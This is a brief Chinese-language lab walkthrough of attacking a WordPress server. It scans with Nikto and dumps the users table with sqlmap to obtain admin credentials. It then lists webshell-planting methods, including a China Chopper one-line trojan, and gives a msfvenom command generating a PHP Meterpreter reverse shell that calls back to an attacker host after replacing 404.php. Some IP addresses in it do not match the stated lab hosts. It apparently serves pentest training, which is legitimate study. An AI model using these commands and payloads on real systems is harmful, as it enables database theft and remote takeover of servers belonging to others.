渗透机:kail ip:172.16.5.6
靶 机:linux ip:172.16.5.7
客户端:windows XP ip: 172.16.5.128
通过Nikto对服务器80端口进行扫描:
nikto -host http://172.16.1.200
发现了login.php文件与phpmyadmin/目录
所以直接在浏览器中访问login.php
sqlmap -u “http://172.16.5.7/login.php” --forms --level 3 -D wordpress8080 -T users --dump
从这里我们就知道了用户名admin与密码SuperSecretPassword登录后台
接下来利用WordPress进行提权操作,基本上提权的方式有三种:
1.将一句话写到一个文件夹下并压缩成.zip格式上传
2.找到能编辑的php文件,将一句话写进去,然后使用菜刀来连接该一句话木马
3.通过php shell反弹木马并结合Meterpreter实现反弹连接
这里我们尝试以读写的方式生成一个shell.php文件。
然后使用windows里的中国菜刀来连接木马的地址
利用msf生成一个php格式的反弹木马脚本
msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.100 LPORT=886 -f raw > shell.php
打开msfconsole控制台
先不着急运行模块,先将木马源码复制出来上传到靶机,替换掉服务器的404.php页面内容,再次访问http://172.16.5.7:8080/wordpress/404.php来触发php反弹木马。
运行模块,成功进入后渗透。